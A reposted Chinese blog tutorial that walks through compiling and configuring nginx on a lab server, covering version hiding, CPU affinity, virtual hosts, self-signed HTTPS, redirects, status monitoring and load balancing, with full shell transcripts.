rpm -q gcc
2 tar zxf nginx-1.12.0.tar.gz
3 yum install -y pcre-devel
4 yum insall -y openssl-devel
5 useradd -M -d /usr/local/lnmp/nginx -s /sbin/nologin -u 800 nginx ###创建nginx用户###
6 cd nginx-1.12.0 ###congigure在此目录下
7 ./configure --prefix=/usr/local/lnmp/nginx --user=nginx --group=nginx --with-threads --with-file-aio --with-http_ssl_module --with-http_stub_status_modul
#####参数说明####
--prefix=/usr/local/lnmp/nginx ###定义一个能够保存服务文件的目录
--user=nginx ###设定用户,该用户要系统中存在,如果没有设定,默认是nobody###
--group=nginx ###设定组###
--with-threads ###支持线程###
--with-http_ssl_module ###允许加载一个模块,为http添加https支持###
--with-http_stub_status_modul ###允许加载一个模块,提供了nginx基础状态信息的访问接口,连接数量,处理的请求等
8 make && make install
9 cd /usr/local/lnmp/nginx/conf ###nginx默认的配置文件nginx.conf在该目录下###
10 cd /usr/local/lnmp/nginx/sbin/ ###nginx服务在该目录下###
11 ./nginx ###开启服务##
开启时碰到了无法开启的情况:端口被占用
nginx: [emerg] bind() to 0.0.0.0:80 failed (98: Address already in use)
nginx: [emerg] bind() to 0.0.0.0:80 failed (98: Address already in use)
nginx: [emerg] bind() to 0.0.0.0:80 failed (98: Address already in use)
nginx: [emerg] bind() to 0.0.0.0:80 failed (98: Address already in use)
nginx: [emerg] bind() to 0.0.0.0:80 failed (98: Address already in use)
nginx: [emerg] still could not bind()
解决:
由于nginx的默认开启端口是80,查看以下端口的使用情况:
[root@server1 sbin]# netstat -antlupt
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN 1121/varnishd
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN 910/sshd
tcp 0 0 127.0.0.1:25 0.0.0.0:* LISTEN 986/master
tcp 0 0 127.0.0.1:6082 0.0.0.0:* LISTEN 1119/varnishd
tcp 0 0 172.25.78.1:22 172.25.78.250:36468 ESTABLISHED 1050/sshd
tcp 0 0 :::8080 :::* LISTEN 1249/httpd
tcp 0 0 :::80 :::* LISTEN 1121/varnishd
tcp 0 0 :::22 :::* LISTEN 910/sshd
tcp 0 0 ::1:25 :::* LISTEN 986/master
由此可见,varnish占用了80端口,只需将varnish服务关闭,或者修改varnish的端口
[root@server1 sbin]# /etc/init.d/varnish stop
Stopping Varnish Cache: [ OK ]
再次开启nginx服务
[root@server1 sbin]# ./nginx
[root@server1 sbin]# netstat -antlupt | grep nginx
tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN 6323/nginx
测试:
curl -I localhost
[root@server1 sbin]# curl localhost -I
HTTP/1.1 200 OK
Server: nginx/1.12.0 ###版本信息会显示出来,不合理###
Date: Wed, 19 Jul 2017 03:59:11 GMT
Content-Type: text/html
Content-Length: 612
Last-Modified: Wed, 19 Jul 2017 03:57:23 GMT
Connection: keep-alive
ETag: "596ed8a3-264"
Accept-Ranges: bytes
[root@server1 nginx]# pwd
/usr/local/lnmp/nginx
[root@server1 nginx]# du -sh
5.9M .
###由于debug 模式编译存在,因此,会比较大,可以把debug模式编译去掉,编译以后程序只有几百 k###
####为了将版本信息隐藏,并且使编译后的程序只有几百 k,进行重新编译###
1 cd /usr/local/lnmp/nginx/sbin/
./nginx -s stop ###将nginx服务关闭###
2 netstat -antlp ###查看,确认服务关闭##
3 rm -fr /usr/local/lnmp/nginx/ ###删除服务的文件目录###
4 cd nginx-1.12.0
make clean ###重新编译时,需要清除旧的对象文件和缓存信息###
5 rm -fr nginx-1.12.0 ###删除解压目录###
6 tar zxf nginx-1.12.0.tar.gz ###重新解压###
7 cd /root/nginx-1.12.0/src/core
vim nginx.h
内容:
#define nginx_version 1012000
#define NGINX_VERSION "1.12.0"
#define NGINX_VER "nginx/" ###将版本信息删除###
8 cd /root/nginx-1.12.0/auto/cc
vim gcc
内容:
171 # debug
172 #CFLAGS="$CFLAGS -g" 把debug模式编译去掉
9 ./configure --prefix=/usr/local/lnmp/nginx --user=nginx --group=nginx --with-threads --with-file-aio --with-http_ssl_module --with-http_stub_status_modul
10 make && make install
11 ln -s /usr/local/lnmp/nginx/sbin/nginx /sbin/ ###软连接,更方便访问###
测试:
[root@server1 nginx]# du -sh
988K
[root@server1 nginx]# curl -I localhost
HTTP/1.1 200 OK
Server: nginx/
Date: Thu, 20 Jul 2017 03:19:28 GMT
Content-Type: text/html
Content-Length: 612
Last-Modified: Thu, 20 Jul 2017 03:16:18 GMT
Connection: keep-alive
ETag: "59702082-264"
Accept-Ranges: bytes
具体过程如下:
[root@server1 ~]# tar zxf nginx-1.12.0.tar.gz
[root@server1 ~]# ls
anaconda-ks.cfg install.log.syslog varnish-3.0.5-1.el6.x86_64.rpm
bansys.zip nginx-1.12.0 varnish-libs-3.0.5-1.el6.x86_64.rpm
install.log nginx-1.12.0.tar.gz
[root@server1 ~]# cd nginx-1.12.0
[root@server1 nginx-1.12.0]# ls
auto CHANGES CHANGES.ru conf configure contrib html LICENSE man README src
[root@server1 nginx-1.12.0]# ./configure --prefix=/usr/local/lnmp/nginx --user=nginx --group=nginx --with-threads --with-file-aio --with-http_ssl_module --with-http_stub_status_module
(省略.....)
出现的问题:
********************************************************************************
checking for PCRE library ... not found
checking for PCRE library in /usr/local/ ... not found
checking for PCRE library in /usr/include/pcre/ ... not found
checking for PCRE library in /usr/pkg/ ... not found
checking for PCRE library in /opt/local/ ... not found
./configure: error: the HTTP rewrite module requires the PCRE library.
You can either disable the module by using --without-http_rewrite_module
option, or install the PCRE library into the system, or build the PCRE library
statically from the source with nginx by using --with-pcre=<path> option.
***********************************************************************************
####由此可见缺少PCRE library,因此要安装pcre-devel#####
[root@server1 nginx-1.12.0]# rpm -q gcc
gcc-4.4.7-4.el6.x86_64
[root@server1 nginx-1.12.0]# yum install -y pcre-devel
[root@server1 nginx-1.12.0]# rpm -q gcc
gcc-4.4.7-4.el6.x86_64
[root@server1 nginx-1.12.0]# ./configure --prefix=/usr/local/lnmp/nginx --user=nginx --group=nginx --with-threads --with-file-aio --with-http_ssl_module --with-http_stub_status_module
(省略安装过程.....)
出现的问题:
**************************************************************************
checking for PCRE JIT support ... not found
checking for OpenSSL library ... not found
checking for OpenSSL library in /usr/local/ ... not found
checking for OpenSSL library in /usr/pkg/ ... not found
checking for OpenSSL library in /opt/local/ ... not found
./configure: error: SSL modules require the OpenSSL library.
You can either do not enable the modules, or install the OpenSSL library
into the system, or build the OpenSSL library statically from the source
with nginx by using --with-openssl=<path> option.
**************************************************************************
###由提示可以看出缺少OpenSSL library,因此要安装openssl-devel####
[root@server1 nginx-1.12.0]# yum install -y openssl-devel
[root@server1 ~]# useradd -M -d /usr/local/lnmp/nginx -s /sbin/nologin -u 800 nginx
[root@server1 nginx-1.12.0]# ./configure --prefix=/usr/local/lnmp/nginx --user=nginx --group=nginx --with-threads --with-file-aio --with-http_ssl_module --with-http_stub_status_module
(省略安装过程.....)
####没有报错,说明配置成功,一般在安装过程中如果缺少什么,就安装对应的 xxxx-devel,因为devel是c开发包,包含c的头文件和库####
[root@server1 nginx-1.12.0]# make && make install
[root@server1 nginx-1.12.0]# cd /usr/local/lnmp/
[root@server1 lnmp]# ls
nginx
[root@server1 lnmp]# cd nginx/
[root@server1 nginx]# ls
conf html logs sbin
[root@server1 nginx]# du -sh
5.9M .
[root@server1 nginx]# ls
conf html logs sbin
[root@server1 nginx]# cd sbin/
[root@server1 sbin]# ls
nginx
[root@server1 sbin]# ./nginx
[root@server1 sbin]# netstat -antlp
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN 6060/nginx
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN 900/sshd
tcp 0 0 127.0.0.1:25 0.0.0.0:* LISTEN 976/master
tcp 0 0 172.25.38.1:22 172.25.38.250:39568 ESTABLISHED 1040/sshd
tcp 0 0 172.25.38.1:22 172.25.38.250:39572 ESTABLISHED 1067/sshd
tcp 0 0 :::22 :::* LISTEN 900/sshd
tcp 0 0 ::1:25 :::* LISTEN 976/master
[root@server1 sbin]# curl localhost -I
HTTP/1.1 200 OK
Server: nginx/1.12.0 ###版本信息会显示出来,不合理###
Date: Wed, 19 Jul 2017 03:59:11 GMT
Content-Type: text/html
Content-Length: 612
Last-Modified: Wed, 19 Jul 2017 03:57:23 GMT
Connection: keep-alive
ETag: "596ed8a3-264"
Accept-Ranges: bytes
[root@server1 sbin]# ./nginx -s stop
[root@server1 sbin]# netstat -antlp
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN 900/sshd
tcp 0 0 127.0.0.1:25 0.0.0.0:* LISTEN 976/master
tcp 0 0 172.25.38.1:22 172.25.38.250:39568 ESTABLISHED 1040/sshd
tcp 0 0 127.0.0.1:59479 127.0.0.1:80 TIME_WAIT -
tcp 0 0 127.0.0.1:59481 127.0.0.1:80 TIME_WAIT -
tcp 0 0 172.25.38.1:22 172.25.38.250:39572 ESTABLISHED 1067/sshd
tcp 0 0 :::22 :::* LISTEN 900/sshd
tcp 0 0 ::1:25 :::* LISTEN 976/master
[root@server1 sbin]# cd /usr/local/
[root@server1 local]# cd lnmp/
[root@server1 lnmp]# rm -fr nginx/
[root@server1 ~]# cd nginx-1.12.0
[root@server1 nginx-1.12.0]# make clean
rm -rf Makefile objs
[root@server1 nginx-1.12.0]# cd ..
[root@server1 ~]# rm -fr nginx-1.12.0
[root@server1 ~]# ls
anaconda-ks.cfg nginx-1.12.0.tar.gz
bansys.zip varnish-3.0.5-1.el6.x86_64.rpm
install.log varnish-libs-3.0.5-1.el6.x86_64.rpm
install.log.syslog
[root@server1 ~]# tar zxf nginx-1.12.0.tar.gz
[root@server1 ~]# ls
anaconda-ks.cfg nginx-1.12.0
bansys.zip nginx-1.12.0.tar.gz
install.log varnish-3.0.5-1.el6.x86_64.rpm
install.log.syslog varnish-libs-3.0.5-1.el6.x86_64.rpm
[root@server1 ~]# cd nginx-1.12.0
[root@server1 nginx-1.12.0]# ls
auto CHANGES.ru configure html man src
CHANGES conf contrib LICENSE README
[root@server1 nginx-1.12.0]# cd src/
[root@server1 src]# ls
core event http mail misc os stream
[root@server1 src]# cd core/
[root@server1 core]# vim nginx.h
[root@server1 core]# cd ..
[root@server1 src]# cd ..
[root@server1 nginx-1.12.0]# cd auto/
[root@server1 auto]# ls
cc have init module os threads
define have_headers install modules sources types
endianness headers lib nohave stubs unix
feature include make options summary
[root@server1 auto]# cd cc/
[root@server1 cc]# ls
acc bcc ccc clang conf gcc icc msvc name owc sunc
[root@server1 cc]# vim gcc
[root@server1 cc]# cd ..
[root@server1 auto]# cd ..
[root@server1 nginx-1.12.0]# ls
auto CHANGES.ru configure html man src
CHANGES conf contrib LICENSE README
[root@server1 nginx-1.12.0]# ./configure --prefix=/usr/local/lnmp/nginx --user=nginx --group=nginx --with-threads --with-file-aio --with-http_ssl_module --with-http_stub_status_module
[root@server1 nginx-1.12.0]# make && make install
[root@server1 nginx-1.12.0]# cd /usr/local/lnmp/nginx/
[root@server1 nginx]# ls
conf html logs sbin
[root@server1 nginx]# du -sh
960K .
[root@server1 nginx]# cd sbin/
[root@server1 sbin]# ls
nginx
[root@server1 sbin]# ./nginx
[root@server1 sbin]# pwd
/usr/local/lnmp/nginx/sbin
[root@server1 sbin]# ln -s /usr/local/lnmp/nginx/sbin/nginx /sbin/
[root@server1 sbin]# which nginx
/sbin/nginx
[root@server1 sbin]# curl -I localhost
HTTP/1.1 200 OK
Server: nginx/
Date: Wed, 19 Jul 2017 04:07:59 GMT
Content-Type: text/html
Content-Length: 612
Last-Modified: Wed, 19 Jul 2017 04:05:33 GMT
Connection: keep-alive
ETag: "596eda8d-264"
Accept-Ranges: bytes
###使用yum安装时应该要看安装时的脚本,防止一些流氓软件###
以httpd为例:
[root@server1 lnmp]# rpm -q --scripts httpd
preinstall scriptlet (using /bin/sh): ###安装前执行的脚本##
# Add the "apache" user
getent group apache >/dev/null || groupadd -g 48 -r apache
getent passwd apache >/dev/null || \
useradd -r -u 48 -g apache -s /sbin/nologin \
-d /var/www -c "Apache" apache
exit 0
postinstall scriptlet (using /bin/sh): ###安装后执行的脚本##
# Register the httpd service
/sbin/chkconfig --add httpd
/sbin/chkconfig --add htcacheclean
preuninstall scriptlet (using /bin/sh):
if [ $1 = 0 ]; then
/sbin/service httpd stop > /dev/null 2>&1
/sbin/chkconfig --del httpd
/sbin/service htcacheclean stop > /dev/null 2>&1
/sbin/chkconfig --del htcacheclean
fi
posttrans scriptlet (using /bin/sh):
test -f /etc/sysconfig/httpd-disable-posttrans || \
/sbin/service httpd condrestart >/dev/null 2>&1 || :
[root@server1 lnmp]# rpm -qi httpd ###查看httpd的信息##
Name : httpd Relocations: (not relocatable)
Version : 2.2.15 Vendor: Red Hat, Inc.
Release : 29.el6_4 Build Date: Fri 02 Aug 2013 08:03:06 PM CST
Install Date: Wed 19 Jul 2017 09:34:59 AM CST Build Host: x86-002.build.bos.redhat.com
Group : System Environment/Daemons Source RPM: httpd-2.2.15-29.el6_4.src.rpm
Size : 3075393 License: ASL 2.0
Signature : RSA/8, Mon 12 Aug 2013 09:49:45 PM CST, Key ID 199e2f91fd431d51
Packager : Red Hat, Inc. <http://bugzilla.redhat.com/bugzilla>
URL : http://httpd.apache.org/
Summary : Apache HTTP Server
Description :
The Apache HTTP Server is a powerful, efficient, and extensible
web server.
####nginx绑定cpu###
1 vim /usr/local/lnmp/nginx/conf/nginx.conf
内容:
worker_processes 2; ###表示开启两个nginx进程###
worker_cpu_affinity 01 10; ###第一个进程对应第一个cpu内核,第二个进程对应第二个cpu内核###
events {
worker_connections 65535; ###允许连接进程的最大数,不能大于fs.file-max的数###
}
2 nginx -t ###查看配置文件是否有语法错误###
3 nginx -s reload ###重新加载nginx###
4 vim /etc/security/limits.conf ###在该文件下编写才会生效###
nginx - nofile 65535
测试:
切换到nginx用户,执行ulimit -a
(在切换前,要将nginx用户改成可以登入usermod -s /bin/bash nginx)
[root@server1 ~]# su - nginx
-bash-4.1$ ulimit -a
core file size (blocks, -c) 0
data seg size (kbytes, -d) unlimited
scheduling priority (-e) 0
file size (blocks, -f) unlimited
pending signals (-i) 14868
max locked memory (kbytes, -l) 64
max memory size (kbytes, -m) unlimited
open files (-n) 65535 ###发现已经改变成了65535###
pipe size (512 bytes, -p) 8
POSIX message queues (bytes, -q) 819200
real-time priority (-r) 0
stack size (kbytes, -s) 10240
cpu time (seconds, -t) unlimited
max user processes (-u) 1024
virtual memory (kbytes, -v) unlimited
file locks (-x) unlimited
-bash-4.1$
##nginx -s reload##有多少核就有几位数,2核是01,四核是0001,8核是00000001,以此类推###
[root@server1 conf]# sysctl -a | grep file ###sysctl -a指显示所有的系统参数###
fs.file-nr = 512 0 188464
fs.file-max = 188464
####nginx建立虚拟主机###
默认发布目录:
/usr/local/lnmp/nginx/html
1 vim /usr/local/lnmp/nginx/conf/nginx.conf
内容:注意该内容要写在http下
server {
listen 80; ###访问80端口###
server_name www.westos.org; ###服务器名称###
location / {
root /web1; ###发布目录###
index index.html; ###网页###
}
}
2 mkdir /web1
3 vim /web1/index.html
内容:
<h1>www.westos.org</h1>
4 nginx -s reload
测试:
具体过程如下:
[root@server1 lnmp]# cd /usr/local/lnmp/nginx/conf/
[root@server1 conf]# ls
fastcgi.conf koi-win scgi_params
fastcgi.conf.default mime.types scgi_params.default
fastcgi_params mime.types.default uwsgi_params
fastcgi_params.default nginx.conf uwsgi_params.default
koi-utf nginx.conf.default win-utf
[root@server1 conf]# vim nginx.conf
[root@server1 conf]# nginx -s reload
[root@server1 conf]# nginx -t
nginx: the configuration file /usr/local/lnmp/nginx/conf/nginx.conf syntax is ok
nginx: configuration file /usr/local/lnmp/nginx/conf/nginx.conf test is successful
[root@server1 conf]# nginx -s reload
[root@server1 conf]# netstat -antlp
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN 8673/nginx
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN 900/sshd
tcp 0 0 127.0.0.1:25 0.0.0.0:* LISTEN 976/master
tcp 0 0 172.25.38.1:22 172.25.38.250:39568 ESTABLISHED 1040/sshd
tcp 0 0 172.25.38.1:22 172.25.38.250:39572 ESTABLISHED 1067/sshd
tcp 0 0 :::22 :::* LISTEN 900/sshd
tcp 0 0 ::1:25 :::* LISTEN 976/master
[root@server1 conf]# vim nginx.conf
[root@server1 conf]# sysctl -a | grep file
fs.file-nr = 544 0 188464
fs.file-max = 188464
[root@server1 conf]# ulimit -a
core file size (blocks, -c) 0
data seg size (kbytes, -d) unlimited
scheduling priority (-e) 0
file size (blocks, -f) unlimited
pending signals (-i) 14868
max locked memory (kbytes, -l) 64
max memory size (kbytes, -m) unlimited
open files (-n) 1024
pipe size (512 bytes, -p) 8
POSIX message queues (bytes, -q) 819200
real-time priority (-r) 0
stack size (kbytes, -s) 10240
cpu time (seconds, -t) unlimited
max user processes (-u) 14868
virtual memory (kbytes, -v) unlimited
file locks (-x) unlimited
[root@server1 conf]# id
uid=0(root) gid=0(root) groups=0(root)
[root@server1 conf]# vim /etc/security/limits.conf
[root@server1 conf]# usermod -s /bin/bash nginx
[root@server1 conf]# su - nginx
-bash-4.1$ ulimit -a
core file size (blocks, -c) 0
data seg size (kbytes, -d) unlimited
scheduling priority (-e) 0
file size (blocks, -f) unlimited
pending signals (-i) 14868
max locked memory (kbytes, -l) 64
max memory size (kbytes, -m) unlimited
open files (-n) 1024
pipe size (512 bytes, -p) 8
POSIX message queues (bytes, -q) 819200
real-time priority (-r) 0
stack size (kbytes, -s) 10240
cpu time (seconds, -t) unlimited
max user processes (-u) 1024
virtual memory (kbytes, -v) unlimited
file locks (-x) unlimited
-bash-4.1$ exit
logout
[root@server1 conf]# usermod -s /sbin/nologin nginx
[root@server1 conf]# vim nginx.conf
[root@server1 conf]# nginx -t ###查看是否有语法错误##
nginx: the configuration file /usr/local/lnmp/nginx/conf/nginx.conf syntax is ok
nginx: configuration file /usr/local/lnmp/nginx/conf/nginx.conf test is successful
[root@server1 conf]# nginx -s reload ###重新加载###
[root@server1 conf]# mkdir /web1
[root@server1 conf]# cd /web1/
[root@server1 web1]# ls
[root@server1 web1]# vim index.html
[root@server1 web1]# nginx -s reload
[root@server1 web1]# cd /usr/local/lnmp/
[root@server1 lnmp]# ls
nginx
[root@server1 lnmp]# cd nginx/
[root@server1 nginx]# ls
client_body_temp fastcgi_temp logs sbin uwsgi_temp
conf html proxy_temp scgi_temp
[root@server1 nginx]# cd html/
[root@server1 html]# ls
50x.html index.html
####https####
端口为443,配置前要确认安装了openssl和openssl-devel,由于之前源码编译时已经安装过,所以在这里就不用再次安装。
信任主机的问题. 采用https 的server 必须从CA 申请一个用于证明服务器用途类型的证书
希望服务器与客户端之间传输内容是加密的,防止中间监听泻露信息,就可以用https进行访问的加密。如果用于内部人员的访问,可以自己颁发证书。
1 cd /etc/pki/tls/certs/
2 make cert.pem ###产生证书和密钥,用该命令会将证书和key放在一个文件里,这样在nginx的配置文件里就不用写两个文件###
【过程:
umask 77 ; \
PEM1=`/bin/mktemp /tmp/openssl.XXXXXX` ; \
PEM2=`/bin/mktemp /tmp/openssl.XXXXXX` ; \
/usr/bin/openssl req -utf8 -newkey rsa:2048 -keyout $PEM1 -nodes -x509 -days 365 -out $PEM2 -set_serial 0 ; \
cat $PEM1 > cert.pem ; \
echo "" >> cert.pem ; \
cat $PEM2 >> cert.pem ; \
rm -f $PEM1 $PEM2
Generating a 2048 bit RSA private key
........................................................+++
..............................+++
writing new private key to '/tmp/openssl.UVFnm7'
-----
You are about to be asked to enter information that will be incorporated
into your certificate request.
What you are about to enter is what is called a Distinguished Name or a DN.
There are quite a few fields but you can leave some blank
For some fields there will be a default value,
If you enter '.', the field will be left blank.
-----
Country Name (2 letter code) [XX]:cn
State or Province Name (full name) []:shaanxi
Locality Name (eg, city) [Default City]:xi'an
Organization Name (eg, company) [Default Company Ltd]:westos
Organizational Unit Name (eg, section) []:linux
Common Name (eg, your name or your server's hostname) []:server1
Email Address []:root@westos.org
】
3 mv /etc/pki/tls/certs/cert.pem /usr/local/lnmp/nginx/conf/ ###在nginx中的配置文件里,给的是相对地址,因此要将其移到配置文件的目录下###
4 vim /usr/local/lnmp/nginx/conf/nginx.conf
内容:
server {
listen 443 ssl;
server_name www.westos.org;
ssl_certificate cert.pem;
ssl_certificate_key cert.pem;
ssl_session_cache shared:SSL:1m;
ssl_session_timeout 5m;
ssl_ciphers HIGH:!aNULL:!MD5;
ssl_prefer_server_ciphers on;
location / {
root /web1;
index index.html index.htm;
}
8 nginx -s reload
测试:
登入https://172.25.38.1
具体过程如下:
[root@server1 conf]# cd /etc/pki/tls/certs/
[root@server1 certs]# ls
ca-bundle.crt ca-bundle.trust.crt make-dummy-cert Makefile renew-dummy-cert
[root@server1 certs]# make cert.pem
umask 77 ; \
PEM1=`/bin/mktemp /tmp/openssl.XXXXXX` ; \
PEM2=`/bin/mktemp /tmp/openssl.XXXXXX` ; \
/usr/bin/openssl req -utf8 -newkey rsa:2048 -keyout $PEM1 -nodes -x509 -days 365 -out $PEM2 -set_serial 0 ; \
cat $PEM1 > cert.pem ; \
echo "" >> cert.pem ; \
cat $PEM2 >> cert.pem ; \
rm -f $PEM1 $PEM2
Generating a 2048 bit RSA private key
........................................................+++
..............................+++
writing new private key to '/tmp/openssl.UVFnm7'
-----
You are about to be asked to enter information that will be incorporated
into your certificate request.
What you are about to enter is what is called a Distinguished Name or a DN.
There are quite a few fields but you can leave some blank
For some fields there will be a default value,
If you enter '.', the field will be left blank.
-----
Country Name (2 letter code) [XX]:cn
State or Province Name (full name) []:shaanxi
Locality Name (eg, city) [Default City]:xi'an
Organization Name (eg, company) [Default Company Ltd]:westos
Organizational Unit Name (eg, section) []:linux
Common Name (eg, your name or your server's hostname) []:server1
Email Address []:root@westos.org
[root@server1 certs]# ll
total 1716
-rw-r--r--. 1 root root 753868 Sep 4 2013 ca-bundle.crt
-rw-r--r--. 1 root root 974993 Sep 4 2013 ca-bundle.trust.crt
-rw------- 1 root root 3088 Jul 19 15:31 cert.pem
-rw------- 1 root root 1383 Jul 19 15:29 localhost.crt
-rwxr-xr-x. 1 root root 610 Sep 27 2013 make-dummy-cert
-rw-r--r--. 1 root root 2242 Sep 27 2013 Makefile
-rwxr-xr-x. 1 root root 829 Sep 27 2013 renew-dummy-cert
[root@server1 certs]# ll cert.pem
-rw------- 1 root root 3088 Jul 19 15:31 cert.pem
[root@server1 certs]# mv cert.pem /usr/local/lnmp/nginx/conf/ ###在nginx中的配置文件里,给的是相对地址,因此要将其移到配置文件的目录下###
[root@server1 certs]# cd /usr/local/lnmp/nginx/conf/
[root@server1 conf]# ls
cert.pem koi-win scgi_params.default
fastcgi.conf mime.types uwsgi_params
fastcgi.conf.default mime.types.default uwsgi_params.default
fastcgi_params nginx.conf win-utf
fastcgi_params.default nginx.conf.default
koi-utf scgi_params
[root@server1 conf]# vim nginx.conf
[root@server1 conf]# nginx -t
nginx: the configuration file /usr/local/lnmp/nginx/conf/nginx.conf syntax is ok
nginx: configuration file /usr/local/lnmp/nginx/conf/nginx.conf test is successful
[root@server1 conf]# nginx -s reload
[root@server1 conf]# netstat -antlp
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN 8673/nginx
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN 900/sshd
tcp 0 0 127.0.0.1:25 0.0.0.0:* LISTEN 976/master
tcp 0 0 0.0.0.0:443 0.0.0.0:* LISTEN 8673/nginx
tcp 0 0 172.25.38.1:22 172.25.38.250:39568 ESTABLISHED 1040/sshd
tcp 0 0 172.25.38.1:22 172.25.38.250:39572 ESTABLISHED 1067/sshd
tcp 0 0 :::22 :::* LISTEN 900/sshd
tcp 0 0 ::1:25 :::* LISTEN 976/master
###网页重写###
当访问www.westos.org时重写成https://www.westos.org
1 vim /usr/local/lnmp/nginx/conf/nginx.conf
内容:
server {
listen 443 ssl;
server_name www.westos.org;
ssl_certificate cert.pem;
ssl_certificate_key cert.pem;
ssl_session_cache shared:SSL:1m;
ssl_session_timeout 5m;
ssl_ciphers HIGH:!aNULL:!MD5;
ssl_prefer_server_ciphers on;
location / {
root /web1;
index index.html index.htm;
}
}
server {
listen 80;
server_name www.westos.org;
rewrite ^(.*)$ https://www.westos.org$1 permanent; ###把你输入的url重定向成https://www.westos.org,permanent表示永久重定向,redirect表示临时重定向,$1表示可以指定访问www.westos.org的目录###
}
2 nginx -s reload
3 vim /web1/admin/index.html
内容:
admin page
测试:
访问www.westos.org和www.westos.org/admin
###监控连接数###
在源码编译nginx的时候编译了--with-http_stub_status_modul该模块,nginx的监控就是该模块的应用
1 vim /usr/local/lnmp/nginx/conf/nginx.conf
内容:
server {
listen 80;
server_name localhost;
location /status { ###/status是一个监控的模块,在源码安装时导入的模块####
stub_status on;
access_log off;
allow 172.25.38.2; ###允许172.25.38.2主机连接##
deny all; ###拒绝除了172.25.38.2之外的其他主机连接,allow和deny有访问的优先顺序###
}
}
2 nginx -s reload
测试:
访问http://172.25.38.1/status
Active connections: 1
server accepts handled requests
9 9 10
Reading: 0 Writing: 1 Waiting: 0
####负载均衡###
1 vim /usr/local/lnmp/nginx/conf/nginx.conf
内容:
http {
upstream westos{ ###westos就是一个别名###
server 172.25.38.2:80 ; ###访问后端服务器的80端口###
server 172.25.38.3:8080; ###访问后端服务器的8080端口##
server 127.0.0.1:8000 backup; ###当后端服务器全挂了之后,就会访问本地的index.html文件(提示系统正在维护中。。。)###
}
server {
listen 80;
server_name www.westos.org;
location / {
proxy_pass http://westos; ###默认是轮询
}
}
2 vim /var/www/html/index.html
内容:
系统正在维护中。。。
3
####负载均衡指定权重weight###
upstream westos{
server 172.25.38.2:80 weight=2; ###指定访问两次172.25.38.2,再访问172.25.38.3一次###
server 172.25.38.3:8080;
#server 127.0.0.1:8000 backup;
}
###ip_hash###
只要来源为同一个ip的都会被指定到同一个后端服务器,不用加权重,不支持backup###
upstream westos{
ip_hash;
server 172.25.38.2:80
server 172.25.38.3:8080;
}
具体过程如下:
[root@server1 conf]# vim nginx.conf
[root@server1 conf]# nginx -t
nginx: the configuration file /usr/local/lnmp/nginx/conf/nginx.conf syntax is ok
nginx: configuration file /usr/local/lnmp/nginx/conf/nginx.conf test is successful
[root@server1 conf]# nginx -s reload
[root@server1 conf]# vim nginx.conf
[root@server1 conf]# nginx -t
nginx: the configuration file /usr/local/lnmp/nginx/conf/nginx.conf syntax is ok
nginx: configuration file /usr/local/lnmp/nginx/conf/nginx.conf test is successful
[root@server1 conf]# nginx -s reload
[root@server1 conf]# cd /web1/
[root@server1 web1]# ls
index.html
[root@server1 web1]# mkdir admin
[root@server1 web1]# ls
admin index.html
[root@server1 web1]# cd admin/
[root@server1 admin]# ls
[root@server1 admin]# vim index.html
[root@server1 admin]# vim index.html
[root@server1 admin]# cd /usr/local/
[root@server1 local]# ls
bin etc games include lib lib64 libexec lnmp sbin share src
[root@server1 local]# cd lnmp/nginx/conf/
[root@server1 conf]# vim nginx.conf
[root@server1 conf]# nginx -t
nginx: the configuration file /usr/local/lnmp/nginx/conf/nginx.conf syntax is ok
nginx: configuration file /usr/local/lnmp/nginx/conf/nginx.conf test is successful
[root@server1 conf]# nginx -s reload
[root@server1 conf]# vim nginx.conf
[root@server1 conf]# nginx -s reload
[root@server1 conf]# vim nginx.conf
[root@server1 conf]# nginx -s reload
[root@server1 conf]# vim nginx.conf
[root@server1 conf]# vim nginx.conf
[root@server1 conf]# vim /etc/httpd/conf/httpd.conf
[root@server1 conf]# /etc/init.d/httpd restart
Stopping httpd: [FAILED]
Starting httpd: httpd: Could not reliably determine the server's fully qualified domain name, using 172.25.38.1 for ServerName
[ OK ]
[root@server1 conf]# /etc/init.d/httpd start
Starting httpd:
[root@server1 conf]# /etc/init.d/httpd restart
Stopping httpd: [ OK ]
Starting httpd: httpd: Could not reliably determine the server's fully qualified domain name, using 172.25.38.1 for ServerName
[ OK ]
[root@server1 conf]# nginx -s reload
[root@server1 conf]# cd /var/www/html/
[root@server1 html]# ls
class_socket.php config.php index.php purge_action.php static
[root@server1 html]# rm -fr *
[root@server1 html]# vim /index.html
[root@server1 html]# /etc/init.d/httpd restart
Stopping httpd: [ OK ]
Starting httpd: httpd: Could not reliably determine the server's fully qualified domain name, using 172.25.38.1 for ServerName
[ OK ]
[root@server1 html]# ls
[root@server1 html]# mv /index.html ./
[root@server1 html]# ls
index.html
[root@server1 html]# cd /usr/local/
bin/ games/ lib/ libexec/ sbin/ src/
etc/ include/ lib64/ lnmp/ share/
[root@server1 html]# cd /usr/local/lnmp/nginx/conf/
[root@server1 conf]# ls
cert.pem koi-win scgi_params.default
fastcgi.conf mime.types uwsgi_params
fastcgi.conf.default mime.types.default uwsgi_params.default
fastcgi_params nginx.conf win-utf
fastcgi_params.default nginx.conf.default
koi-utf scgi_params
[root@server1 conf]# vim nginx.conf
[root@server1 conf]# nginx -s reload
[root@server1 conf]# vim nginx.conf
[root@server1 conf]# nginx -s reload
本文转自blueclo51CTO博客,原文链接:http://blog.51cto.com/12774272/1949538 ,如需转载请自行联系原作者
